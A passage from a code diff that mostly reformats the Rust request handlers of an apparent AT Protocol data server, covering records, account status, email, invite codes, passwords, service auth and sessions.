written_cids 288 + .iter() 289 + .map(|c| c.to_string()) 290 + .collect::<Vec<_>>(); 291 + if let Err(e) = commit_and_log( 292 + &state, 293 + CommitParams { 294 + did: &did, 295 + user_id, 296 + current_root_cid: Some(current_root_cid), 297 + prev_data_cid: Some(commit.data), 298 + new_mst_root, 299 + ops: vec![op], 300 + blocks_cids: &written_cids_str, 301 + }, 302 + ) 303 + .await 304 + { 305 + return ( 306 + StatusCode::INTERNAL_SERVER_ERROR, 307 + Json(json!({"error": "InternalError", "message": e})), 308 + ) 309 + .into_response(); 233 310 }; 234 - (StatusCode::OK, Json(CreateRecordOutput { 235 - uri: format!("at://{}/{}/{}", did, input.collection, rkey), 236 - cid: record_cid.to_string(), 237 - })).into_response() 311 + ( 312 + StatusCode::OK, 313 + Json(CreateRecordOutput { 314 + uri: format!("at://{}/{}/{}", did, input.collection, rkey), 315 + cid: record_cid.to_string(), 316 + }), 317 + ) 318 + .into_response() 238 319 } 239 320 #[derive(Deserialize)] 240 321 #[allow(dead_code)] ··· 265 346 Ok(res) => res, 266 347 Err(err_res) => return err_res, 267 348 }; 268 - if let Some(swap_commit) = &input.swap_commit { 269 - if Cid::from_str(swap_commit).ok() != Some(current_root_cid) { 270 - return (StatusCode::CONFLICT, Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"}))).into_response(); 349 + if let Some(swap_commit) = &input.swap_commit 350 + && Cid::from_str(swap_commit).ok() != Some(current_root_cid) { 351 + return ( 352 + StatusCode::CONFLICT, 353 + Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 354 + ) 355 + .into_response(); 271 356 } 272 - } 273 357 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 274 358 let commit_bytes = match tracking_store.get(&current_root_cid).await { 275 359 Ok(Some(b)) => b, 276 - _ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Commit block not found"}))).into_response(), 360 + _ => { 361 + return ( 362 + StatusCode::INTERNAL_SERVER_ERROR, 363 + Json(json!({"error": "InternalError", "message": "Commit block not found"})), 364 + ) 365 + .into_response(); 366 + } 277 367 }; 278 368 let commit = match Commit::from_cbor(&commit_bytes) { 279 369 Ok(c) => c, 280 - _ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to parse commit"}))).into_response(), 370 + _ => { 371 + return ( 372 + StatusCode::INTERNAL_SERVER_ERROR, 373 + Json(json!({"error": "InternalError", "message": "Failed to parse commit"})), 374 + ) 375 + .into_response(); 376 + } 281 377 }; 282 - let mst = Mst::load( 283 - Arc::new(tracking_store.clone()), 284 - commit.data, 285 - None, 286 - ); 378 + let mst = Mst::load(Arc::new(tracking_store.clone()), commit.data, None); 287 379 let collection_nsid = match input.collection.parse::<Nsid>() { 288 380 Ok(n) => n, 289 - Err(_) => return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidCollection"}))).into_response(), 381 + Err(_) => { 382 + return ( 383 + StatusCode::BAD_REQUEST, 384 + Json(json!({"error": "InvalidCollection"})), 385 + ) 386 + .into_response(); 387 + } 290 388 }; 291 389 let key = format!("{}/{}", collection_nsid, input.rkey); 292 - if input.validate.unwrap_or(true) { 293 - if let Err(err_response) = validate_record(&input.record, &input.collection) { 294 - return err_response; 390 + if input.validate.unwrap_or(true) 391 + && let Err(err_response) = validate_record(&input.record, &input.collection) { 392 + return *err_response; 295 393 } 296 - } 297 394 if let Some(swap_record_str) = &input.swap_record { 298 395 let expected_cid = Cid::from_str(swap_record_str).ok(); 299 396 let actual_cid = mst.get(&key).await.ok().flatten(); ··· 304 401 let existing_cid = mst.get(&key).await.ok().flatten(); 305 402 let mut record_bytes = Vec::new(); 306 403 if serde_ipld_dagcbor::to_writer(&mut record_bytes, &input.record).is_err() { 307 - return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidRecord", "message": "Failed to serialize record"}))).into_response(); 404 + return ( 405 + StatusCode::BAD_REQUEST, 406 + Json(json!({"error": "InvalidRecord", "message": "Failed to serialize record"})), 407 + ) 408 + .into_response(); 308 409 } 309 410 let record_cid = match tracking_store.put(&record_bytes).await { 310 411 Ok(c) => c, 311 - _ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to save record block"}))).into_response(), 412 + _ => { 413 + return ( 414 + StatusCode::INTERNAL_SERVER_ERROR, 415 + Json(json!({"error": "InternalError", "message": "Failed to save record block"})), 416 + ) 417 + .into_response(); 418 + } 312 419 }; 313 420 let new_mst = if existing_cid.is_some() { 314 421 match mst.update(&key, record_cid).await { 315 422 Ok(m) => m, 316 - Err(_) => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to update MST"}))).into_response(), 423 + Err(_) => { 424 + return ( 425 + StatusCode::INTERNAL_SERVER_ERROR, 426 + Json(json!({"error": "InternalError", "message": "Failed to update MST"})), 427 + ) 428 + .into_response(); 429 + } 317 430 } 318 431 } else { 319 432 match mst.add(&key, record_cid).await { 320 433 Ok(m) => m, 321 - Err(_) => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to add to MST"}))).into_response(), 434 + Err(_) => { 435 + return ( 436 + StatusCode::INTERNAL_SERVER_ERROR, 437 + Json(json!({"error": "InternalError", "message": "Failed to add to MST"})), 438 + ) 439 + .into_response(); 440 + } 322 441 } 323 442 }; 324 443 let new_mst_root = match new_mst.persist().await { 325 444 Ok(c) => c, 326 - Err(_) => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to persist MST"}))).into_response(), 445 + Err(_) => { 446 + return ( 447 + StatusCode::INTERNAL_SERVER_ERROR, 448 + Json(json!({"error": "InternalError", "message": "Failed to persist MST"})), 449 + ) 450 + .into_response(); 451 + } 327 452 }; 328 453 let op = if existing_cid.is_some() { 329 - RecordOp::Update { collection: input.collection.clone(), rkey: input.rkey.clone(), cid: record_cid, prev: existing_cid } 454 + RecordOp::Update { 455 + collection: input.collection.clone(), 456 + rkey: input.rkey.clone(), 457 + cid: record_cid, 458 + prev: existing_cid, 459 + } 330 460 } else { 331 - RecordOp::Create { collection: input.collection.clone(), rkey: input.rkey.clone(), cid: record_cid } 461 + RecordOp::Create { 462 + collection: input.collection.clone(), 463 + rkey: input.rkey.clone(), 464 + cid: record_cid, 465 + } 332 466 }; 333 467 let mut relevant_blocks = std::collections::BTreeMap::new(); 334 - if let Err(_) = new_mst.blocks_for_path(&key, &mut relevant_blocks).await { 468 + if new_mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 335 469 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response(); 336 470 } 337 - if let Err(_) = mst.blocks_for_path(&key, &mut relevant_blocks).await { 471 + if mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 338 472 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response(); 339 473 } 340 474 relevant_blocks.insert(record_cid, bytes::Bytes::from(record_bytes)); ··· 344 478 written_cids.push(*cid); 345 479 } 346 480 } 347 - let written_cids_str = written_cids.iter().map(|c| c.to_string()).collect::<Vec<_>>(); 348 - if let Err(e) = commit_and_log(&state, &did, user_id, Some(current_root_cid), Some(commit.data), new_mst_root, vec![op], &written_cids_str).await { 349 - return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": e}))).into_response(); 481 + let written_cids_str = written_cids 482 + .iter() 483 + .map(|c| c.to_string()) 484 + .collect::<Vec<_>>(); 485 + if let Err(e) = commit_and_log( 486 + &state, 487 + CommitParams { 488 + did: &did, 489 + user_id, 490 + current_root_cid: Some(current_root_cid), 491 + prev_data_cid: Some(commit.data), 492 + new_mst_root, 493 + ops: vec![op], 494 + blocks_cids: &written_cids_str, 495 + }, 496 + ) 497 + .await 498 + { 499 + return ( 500 + StatusCode::INTERNAL_SERVER_ERROR, 501 + Json(json!({"error": "InternalError", "message": e})), 502 + ) 503 + .into_response(); 350 504 }; 351 - (StatusCode::OK, Json(PutRecordOutput { 352 - uri: format!("at://{}/{}/{}", did, input.collection, input.rkey), 353 - cid: record_cid.to_string(), 354 - })).into_response() 505 + ( 506 + StatusCode::OK, 507 + Json(PutRecordOutput { 508 + uri: format!("at://{}/{}/{}", did, input.collection, input.rkey), 509 + cid: record_cid.to_string(), 510 + }), 511 + ) 512 + .into_response() 355 513 }
+67 -34
src/api/server/account_status.rs
··· 32 32 headers: axum::http::HeaderMap, 33 33 ) -> Response { 34 34 let extracted = match crate::auth::extract_auth_token_from_header( 35 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 35 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 36 36 ) { 37 37 Some(t) => t, 38 38 None => return ApiError::AuthenticationRequired.into_response(), 39 39 }; 40 40 let dpop_proof = headers.get("DPoP").and_then(|h| h.to_str().ok()); 41 - let http_uri = format!("https://{}/xrpc/com.atproto.server.checkAccountStatus", 42 - std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())); 41 + let http_uri = format!( 42 + "https://{}/xrpc/com.atproto.server.checkAccountStatus", 43 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()) 44 + ); 43 45 let did = match crate::auth::validate_token_with_dpop( 44 46 &state.db, 45 47 &extracted.token, ··· 48 50 "GET", 49 51 &http_uri, 50 52 true, 51 - ).await { 53 + ) 54 + .await 55 + { 52 56 Ok(user) => user.did, 53 57 Err(e) => return ApiError::from(e).into_response(), 54 58 }; ··· 72 76 Ok(Some(row)) => row.deactivated_at, 73 77 _ => None, 74 78 }; 75 - let repo_result = sqlx::query!("SELECT repo_root_cid FROM repos WHERE user_id = $1", user_id) 76 - .fetch_optional(&state.db) 77 - .await; 79 + let repo_result = sqlx::query!( 80 + "SELECT repo_root_cid FROM repos WHERE user_id = $1", 81 + user_id 82 + ) 83 + .fetch_optional(&state.db) 84 + .await; 78 85 let repo_commit = match repo_result { 79 86 Ok(Some(row)) => row.repo_root_cid, 80 87 _ => String::new(), 81 88 }; 82 - let record_count: i64 = sqlx::query_scalar!("SELECT COUNT(*) FROM records WHERE repo_id = $1", user_id) 83 - .fetch_one(&state.db) 84 - .await 85 - .unwrap_or(Some(0)) 86 - .unwrap_or(0); 87 - let blob_count: i64 = 88 - sqlx::query_scalar!("SELECT COUNT(*) FROM blobs WHERE created_by_user = $1", user_id) 89 + let record_count: i64 = 90 + sqlx::query_scalar!("SELECT COUNT(*) FROM records WHERE repo_id = $1", user_id) 89 91 .fetch_one(&state.db) 90 92 .await 91 93 .unwrap_or(Some(0)) 92 94 .unwrap_or(0); 95 + let blob_count: i64 = sqlx::query_scalar!( 96 + "SELECT COUNT(*) FROM blobs WHERE created_by_user = $1", 97 + user_id 98 + ) 99 + .fetch_one(&state.db) 100 + .await 101 + .unwrap_or(Some(0)) 102 + .unwrap_or(0); 93 103 let valid_did = did.starts_with("did:"); 94 104 ( 95 105 StatusCode::OK, ··· 113 123 headers: axum::http::HeaderMap, 114 124 ) -> Response { 115 125 let extracted = match crate::auth::extract_auth_token_from_header( 116 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 126 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 117 127 ) { 118 128 Some(t) => t, 119 129 None => return ApiError::AuthenticationRequired.into_response(), 120 130 }; 121 131 let dpop_proof = headers.get("DPoP").and_then(|h| h.to_str().ok()); 122 - let http_uri = format!("https://{}/xrpc/com.atproto.server.activateAccount", 123 - std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())); 132 + let http_uri = format!( 133 + "https://{}/xrpc/com.atproto.server.activateAccount", 134 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()) 135 + ); 124 136 let did = match crate::auth::validate_token_with_dpop( 125 137 &state.db, 126 138 &extracted.token, ··· 129 141 "POST", 130 142 &http_uri, 131 143 true, 132 - ).await { 144 + ) 145 + .await 146 + { 133 147 Ok(user) => user.did, 134 148 Err(e) => return ApiError::from(e).into_response(), 135 149 }; ··· 171 185 Json(_input): Json<DeactivateAccountInput>, 172 186 ) -> Response { 173 187 let extracted = match crate::auth::extract_auth_token_from_header( 174 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 188 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 175 189 ) { 176 190 Some(t) => t, 177 191 None => return ApiError::AuthenticationRequired.into_response(), 178 192 }; 179 193 let dpop_proof = headers.get("DPoP").and_then(|h| h.to_str().ok()); 180 - let http_uri = format!("https://{}/xrpc/com.atproto.server.deactivateAccount", 181 - std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())); 194 + let http_uri = format!( 195 + "https://{}/xrpc/com.atproto.server.deactivateAccount", 196 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()) 197 + ); 182 198 let did = match crate::auth::validate_token_with_dpop( 183 199 &state.db, 184 200 &extracted.token, ··· 187 203 "POST", 188 204 &http_uri, 189 205 false, 190 - ).await { 206 + ) 207 + .await 208 + { 191 209 Ok(user) => user.did, 192 210 Err(e) => return ApiError::from(e).into_response(), 193 211 }; ··· 196 214 .await 197 215 .ok() 198 216 .flatten(); 199 - let result = sqlx::query!("UPDATE users SET deactivated_at = NOW() WHERE did = $1", did) 200 - .execute(&state.db) 201 - .await; 217 + let result = sqlx::query!( 218 + "UPDATE users SET deactivated_at = NOW() WHERE did = $1", 219 + did 220 + ) 221 + .execute(&state.db) 222 + .await; 202 223 match result { 203 224 Ok(_) => { 204 225 if let Some(h) = handle { ··· 222 243 headers: axum::http::HeaderMap, 223 244 ) -> Response { 224 245 let extracted = match crate::auth::extract_auth_token_from_header( 225 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 246 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 226 247 ) { 227 248 Some(t) => t, 228 249 None => return ApiError::AuthenticationRequired.into_response(), 229 250 }; 230 251 let dpop_proof = headers.get("DPoP").and_then(|h| h.to_str().ok()); 231 - let http_uri = format!("https://{}/xrpc/com.atproto.server.requestAccountDelete", 232 - std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())); 252 + let http_uri = format!( 253 + "https://{}/xrpc/com.atproto.server.requestAccountDelete", 254 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()) 255 + ); 233 256 let did = match crate::auth::validate_token_with_dpop( 234 257 &state.db, 235 258 &extracted.token, ··· 238 261 "POST", 239 262 &http_uri, 240 263 true, 241 - ).await { 264 + ) 265 + .await 266 + { 242 267 Ok(user) => user.did, 243 268 Err(e) => return ApiError::from(e).into_response(), 244 269 }; ··· 274 299 .into_response(); 275 300 } 276 301 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 277 - if let Err(e) = 278 - crate::notifications::enqueue_account_deletion(&state.db, user_id, &confirmation_token, &hostname).await 302 + if let Err(e) = crate::notifications::enqueue_account_deletion( 303 + &state.db, 304 + user_id, 305 + &confirmation_token, 306 + &hostname, 307 + ) 308 + .await 279 309 { 280 310 warn!("Failed to enqueue account deletion notification: {:?}", e); 281 311 } ··· 395 425 .into_response(); 396 426 } 397 427 if Utc::now() > expires_at { 398 - let _ = sqlx::query!("DELETE FROM account_deletion_requests WHERE token = $1", token) 399 - .execute(&state.db) 400 - .await; 428 + let _ = sqlx::query!( 429 + "DELETE FROM account_deletion_requests WHERE token = $1", 430 + token 431 + ) 432 + .execute(&state.db) 433 + .await; 401 434 return ( 402 435 StatusCode::BAD_REQUEST, 403 436 Json(json!({"error": "ExpiredToken", "message": "Token has expired"})),
+6 -2
src/api/server/app_password.rs
··· 80 80 Json(input): Json<CreateAppPasswordInput>, 81 81 ) -> Response { 82 82 let client_ip = crate::rate_limit::extract_client_ip(&headers, None); 83 - if !state.check_rate_limit(RateLimitKind::AppPassword, &client_ip).await { 83 + if !state 84 + .check_rate_limit(RateLimitKind::AppPassword, &client_ip) 85 + .await 86 + { 84 87 warn!(ip = %client_ip, "App password creation rate limit exceeded"); 85 88 return ( 86 89 axum::http::StatusCode::TOO_MANY_REQUESTS, ··· 88 91 "error": "RateLimitExceeded", 89 92 "message": "Too many requests. Please try again later." 90 93 })), 91 - ).into_response(); 94 + ) 95 + .into_response(); 92 96 } 93 97 let user_id = match get_user_id_by_did(&state.db, &auth_user.did).await { 94 98 Ok(id) => id,
+37 -30
src/api/server/email.rs
··· 27 27 Json(input): Json<RequestEmailUpdateInput>, 28 28 ) -> Response { 29 29 let client_ip = crate::rate_limit::extract_client_ip(&headers, None); 30 - if !state.check_rate_limit(RateLimitKind::EmailUpdate, &client_ip).await { 30 + if !state 31 + .check_rate_limit(RateLimitKind::EmailUpdate, &client_ip) 32 + .await 33 + { 31 34 warn!(ip = %client_ip, "Email update rate limit exceeded"); 32 35 return ( 33 36 StatusCode::TOO_MANY_REQUESTS, ··· 35 38 "error": "RateLimitExceeded", 36 39 "message": "Too many requests. Please try again later." 37 40 })), 38 - ).into_response(); 41 + ) 42 + .into_response(); 39 43 } 40 44 let token = match crate::auth::extract_bearer_token_from_header( 41 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 45 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 42 46 ) { 43 47 Some(t) => t, 44 48 None => { ··· 108 112 } 109 113 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 110 114 if let Err(e) = crate::notifications::enqueue_email_update( 111 - &state.db, 112 - user_id, 113 - &email, 114 - &handle, 115 - &code, 116 - &hostname, 115 + &state.db, user_id, &email, &handle, &code, &hostname, 117 116 ) 118 117 .await 119 118 { ··· 136 135 Json(input): Json<ConfirmEmailInput>, 137 136 ) -> Response { 138 137 let client_ip = crate::rate_limit::extract_client_ip(&headers, None); 139 - if !state.check_rate_limit(RateLimitKind::AppPassword, &client_ip).await { 138 + if !state 139 + .check_rate_limit(RateLimitKind::AppPassword, &client_ip) 140 + .await 141 + { 140 142 warn!(ip = %client_ip, "Confirm email rate limit exceeded"); 141 143 return ( 142 144 StatusCode::TOO_MANY_REQUESTS, ··· 144 146 "error": "RateLimitExceeded", 145 147 "message": "Too many requests. Please try again later." 146 148 })), 147 - ).into_response(); 149 + ) 150 + .into_response(); 148 151 } 149 152 let token = match crate::auth::extract_bearer_token_from_header( 150 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 153 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 151 154 ) { 152 155 Some(t) => t, 153 156 None => { ··· 185 188 let email_pending_verification = user.email_pending_verification; 186 189 let email = input.email.trim().to_lowercase(); 187 190 let confirmation_code = input.token.trim(); 188 - let (pending_email, saved_code, expiry) = match (email_pending_verification, stored_code, expires_at) { 189 - (Some(p), Some(c), Some(e)) => (p, c, e), 190 - _ => { 191 - return ( 191 + let (pending_email, saved_code, expiry) = 192 + match (email_pending_verification, stored_code, expires_at) { 193 + (Some(p), Some(c), Some(e)) => (p, c, e), 194 + _ => { 195 + return ( 192 196 StatusCode::BAD_REQUEST, 193 - Json(json!({"error": "InvalidRequest", "message": "No pending email update found"})), 197 + Json( 198 + json!({"error": "InvalidRequest", "message": "No pending email update found"}), 199 + ), 194 200 ) 195 201 .into_response(); 196 - } 197 - }; 202 + } 203 + }; 198 204 if pending_email != email { 199 205 return ( 200 206 StatusCode::BAD_REQUEST, ··· 203 209 .into_response(); 204 210 } 205 211 if saved_code != confirmation_code { 206 - return ( 212 + return ( 207 213 StatusCode::BAD_REQUEST, 208 214 Json(json!({"error": "InvalidToken", "message": "Invalid token"})), 209 215 ) ··· 225 231 .await; 226 232 if let Err(e) = update { 227 233 error!("DB error finalizing email update: {:?}", e); 228 - if e.as_database_error().map(|db_err| db_err.is_unique_violation()).unwrap_or(false) { 229 - return ( 234 + if e.as_database_error() 235 + .map(|db_err| db_err.is_unique_violation()) 236 + .unwrap_or(false) 237 + { 238 + return ( 230 239 StatusCode::BAD_REQUEST, 231 240 Json(json!({"error": "EmailTaken", "message": "Email already taken"})), 232 241 ) 233 242 .into_response(); 234 - } 243 + } 235 244 return ( 236 245 StatusCode::INTERNAL_SERVER_ERROR, 237 246 Json(json!({"error": "InternalError"})), ··· 257 266 Json(input): Json<UpdateEmailInput>, 258 267 ) -> Response { 259 268 let token = match crate::auth::extract_bearer_token_from_header( 260 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 269 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 261 270 ) { 262 271 Some(t) => t, 263 272 None => { ··· 302 311 ) 303 312 .into_response(); 304 313 } 305 - if let Some(ref current) = current_email { 306 - if new_email == current.to_lowercase() { 314 + if let Some(ref current) = current_email 315 + && new_email == current.to_lowercase() { 307 316 return (StatusCode::OK, Json(json!({}))).into_response(); 308 317 } 309 - } 310 318 let email_confirmed = stored_code.is_some() && email_pending_verification.is_some(); 311 319 if email_confirmed { 312 320 let confirmation_token = match &input.token { ··· 353 361 ) 354 362 .into_response(); 355 363 } 356 - if let Some(exp) = expires_at { 357 - if Utc::now() > exp { 364 + if let Some(exp) = expires_at 365 + && Utc::now() > exp { 358 366 return ( 359 367 StatusCode::BAD_REQUEST, 360 368 Json(json!({"error": "ExpiredToken", "message": "Token has expired"})), 361 369 ) 362 370 .into_response(); 363 371 } 364 - } 365 372 } 366 373 let exists = sqlx::query!( 367 374 "SELECT 1 as one FROM users WHERE LOWER(email) = $1 AND id != $2",
+16 -12
src/api/server/invite.rs
··· 143 143 }); 144 144 } else { 145 145 for account_did in for_accounts { 146 - let target_user_id = match sqlx::query!("SELECT id FROM users WHERE did = $1", account_did) 147 - .fetch_optional(&state.db) 148 - .await 149 - { 150 - Ok(Some(row)) => row.id, 151 - Ok(None) => continue, 152 - Err(e) => { 153 - error!("DB error looking up target account: {:?}", e); 154 - return ApiError::InternalError.into_response(); 155 - } 156 - }; 146 + let target_user_id = 147 + match sqlx::query!("SELECT id FROM users WHERE did = $1", account_did) 148 + .fetch_optional(&state.db) 149 + .await 150 + { 151 + Ok(Some(row)) => row.id, 152 + Ok(None) => continue, 153 + Err(e) => { 154 + error!("DB error looking up target account: {:?}", e); 155 + return ApiError::InternalError.into_response(); 156 + } 157 + }; 157 158 let mut codes = Vec::new(); 158 159 for _ in 0..code_count { 159 160 let code = Uuid::new_v4().to_string(); ··· 177 178 }); 178 179 } 179 180 } 180 - Json(CreateInviteCodesOutput { codes: result_codes }).into_response() 181 + Json(CreateInviteCodesOutput { 182 + codes: result_codes, 183 + }) 184 + .into_response() 181 185 } 182 186 183 187 #[derive(Deserialize)]
+4 -1
src/api/server/mod.rs
··· 18 18 pub use meta::{describe_server, health, robots_txt}; 19 19 pub use password::{request_password_reset, reset_password}; 20 20 pub use service_auth::get_service_auth; 21 - pub use session::{confirm_signup, create_session, delete_session, get_session, refresh_session, resend_verification}; 21 + pub use session::{ 22 + confirm_signup, create_session, delete_session, get_session, refresh_session, 23 + resend_verification, 24 + }; 22 25 pub use signing_key::reserve_signing_key;
+27 -20
src/api/server/password.rs
··· 5 5 http::{HeaderMap, StatusCode}, 6 6 response::{IntoResponse, Response}, 7 7 }; 8 - use bcrypt::{hash, DEFAULT_COST}; 8 + use bcrypt::{DEFAULT_COST, hash}; 9 9 use chrono::{Duration, Utc}; 10 10 use serde::Deserialize; 11 11 use serde_json::json; ··· 15 15 crate::util::generate_token_code() 16 16 } 17 17 fn extract_client_ip(headers: &HeaderMap) -> String { 18 - if let Some(forwarded) = headers.get("x-forwarded-for") { 19 - if let Ok(value) = forwarded.to_str() { 20 - if let Some(first_ip) = value.split(',').next() { 18 + if let Some(forwarded) = headers.get("x-forwarded-for") 19 + && let Ok(value) = forwarded.to_str() 20 + && let Some(first_ip) = value.split(',').next() { 21 21 return first_ip.trim().to_string(); 22 22 } 23 - } 24 - } 25 - if let Some(real_ip) = headers.get("x-real-ip") { 26 - if let Ok(value) = real_ip.to_str() { 23 + if let Some(real_ip) = headers.get("x-real-ip") 24 + && let Ok(value) = real_ip.to_str() { 27 25 return value.trim().to_string(); 28 26 } 29 - } 30 27 "unknown".to_string() 31 28 } 32 29 ··· 41 38 Json(input): Json<RequestPasswordResetInput>, 42 39 ) -> Response { 43 40 let client_ip = extract_client_ip(&headers); 44 - if !state.check_rate_limit(RateLimitKind::PasswordReset, &client_ip).await { 41 + if !state 42 + .check_rate_limit(RateLimitKind::PasswordReset, &client_ip) 43 + .await 44 + { 45 45 warn!(ip = %client_ip, "Password reset rate limit exceeded"); 46 46 return ( 47 47 StatusCode::TOO_MANY_REQUESTS, ··· 118 118 Json(input): Json<ResetPasswordInput>, 119 119 ) -> Response { 120 120 let client_ip = extract_client_ip(&headers); 121 - if !state.check_rate_limit(RateLimitKind::ResetPassword, &client_ip).await { 121 + if !state 122 + .check_rate_limit(RateLimitKind::ResetPassword, &client_ip) 123 + .await 124 + { 122 125 warn!(ip = %client_ip, "Reset password rate limit exceeded"); 123 126 return ( 124 127 StatusCode::TOO_MANY_REQUESTS, ··· 126 129 "error": "RateLimitExceeded", 127 130 "message": "Too many requests. Please try again later." 128 131 })), 129 - ).into_response(); 132 + ) 133 + .into_response(); 130 134 } 131 135 let token = input.token.trim(); 132 136 let password = &input.password; ··· 232 236 ) 233 237 .into_response(); 234 238 } 235 - let user_did = match sqlx::query_scalar!( 236 - "SELECT did FROM users WHERE id = $1", 237 - user_id 238 - ) 239 - .fetch_one(&mut *tx) 240 - .await 239 + let user_did = match sqlx::query_scalar!("SELECT did FROM users WHERE id = $1", user_id) 240 + .fetch_one(&mut *tx) 241 + .await 241 242 { 242 243 Ok(did) => did, 243 244 Err(e) => { ··· 266 267 .execute(&mut *tx) 267 268 .await 268 269 { 269 - error!("Failed to invalidate sessions after password reset: {:?}", e); 270 + error!( 271 + "Failed to invalidate sessions after password reset: {:?}", 272 + e 273 + ); 270 274 return ( 271 275 StatusCode::INTERNAL_SERVER_ERROR, 272 276 Json(json!({"error": "InternalError"})), ··· 284 288 for jti in session_jtis { 285 289 let cache_key = format!("auth:session:{}:{}", user_did, jti); 286 290 if let Err(e) = state.cache.delete(&cache_key).await { 287 - warn!("Failed to invalidate session cache for {}: {:?}", cache_key, e); 291 + warn!( 292 + "Failed to invalidate session cache for {}: {:?}", 293 + cache_key, e 294 + ); 288 295 } 289 296 } 290 297 info!("Password reset completed for user {}", user_id);
+25 -14
src/api/server/service_auth.rs
··· 28 28 Query(params): Query<GetServiceAuthParams>, 29 29 ) -> Response { 30 30 let token = match crate::auth::extract_bearer_token_from_header( 31 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 31 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 32 32 ) { 33 33 Some(t) => t, 34 34 None => return ApiError::AuthenticationRequired.into_response(), ··· 39 39 }; 40 40 let key_bytes = match auth_user.key_bytes { 41 41 Some(kb) => kb, 42 - None => return ApiError::AuthenticationFailedMsg("OAuth tokens cannot create service auth".into()).into_response(), 43 - }; 44 - let lxm = params.lxm.as_deref().unwrap_or("*"); 45 - let service_token = match crate::auth::create_service_token(&auth_user.did, &params.aud, lxm, &key_bytes) 46 - { 47 - Ok(t) => t, 48 - Err(e) => { 49 - error!("Failed to create service token: {:?}", e); 50 - return ( 51 - StatusCode::INTERNAL_SERVER_ERROR, 52 - Json(json!({"error": "InternalError"})), 42 + None => { 43 + return ApiError::AuthenticationFailedMsg( 44 + "OAuth tokens cannot create service auth".into(), 53 45 ) 54 - .into_response(); 46 + .into_response(); 55 47 } 56 48 }; 57 - (StatusCode::OK, Json(GetServiceAuthOutput { token: service_token })).into_response() 49 + let lxm = params.lxm.as_deref().unwrap_or("*"); 50 + let service_token = 51 + match crate::auth::create_service_token(&auth_user.did, &params.aud, lxm, &key_bytes) { 52 + Ok(t) => t, 53 + Err(e) => { 54 + error!("Failed to create service token: {:?}", e); 55 + return ( 56 + StatusCode::INTERNAL_SERVER_ERROR, 57 + Json(json!({"error": "InternalError"})), 58 + ) 59 + .into_response(); 60 + } 61 + }; 62 + ( 63 + StatusCode::OK, 64 + Json(GetServiceAuthOutput { 65 + token: service_token, 66 + }), 67 + ) 68 + .into_response() 58 69 }
+92 -60
src/api/server/session.rs
··· 14 14 use tracing::{error, info, warn}; 15 15 16 16 fn extract_client_ip(headers: &HeaderMap) -> String { 17 - if let Some(forwarded) = headers.get("x-forwarded-for") { 18 - if let Ok(value) = forwarded.to_str() { 19 - if let Some(first_ip) = value.split(',').next() { 17 + if let Some(forwarded) = headers.get("x-forwarded-for") 18 + && let Ok(value) = forwarded.to_str() 19 + && let Some(first_ip) = value.split(',').next() { 20 20 return first_ip.trim().to_string(); 21 21 } 22 - } 23 - } 24 - if let Some(real_ip) = headers.get("x-real-ip") { 25 - if let Ok(value) = real_ip.to_str() { 22 + if let Some(real_ip) = headers.get("x-real-ip") 23 + && let Ok(value) = real_ip.to_str() { 26 24 return value.trim().to_string(); 27 25 } 28 - } 29 26 "unknown".to_string() 30 27 } 31 28 ··· 60 57 ) -> Response { 61 58 info!("create_session called"); 62 59 let client_ip = extract_client_ip(&headers); 63 - if !state.check_rate_limit(RateLimitKind::Login, &client_ip).await { 60 + if !state 61 + .check_rate_limit(RateLimitKind::Login, &client_ip) 62 + .await 63 + { 64 64 warn!(ip = %client_ip, "Login rate limit exceeded"); 65 65 return ( 66 66 StatusCode::TOO_MANY_REQUESTS, ··· 88 88 { 89 89 Ok(Some(row)) => row, 90 90 Ok(None) => { 91 - let _ = verify(&input.password, 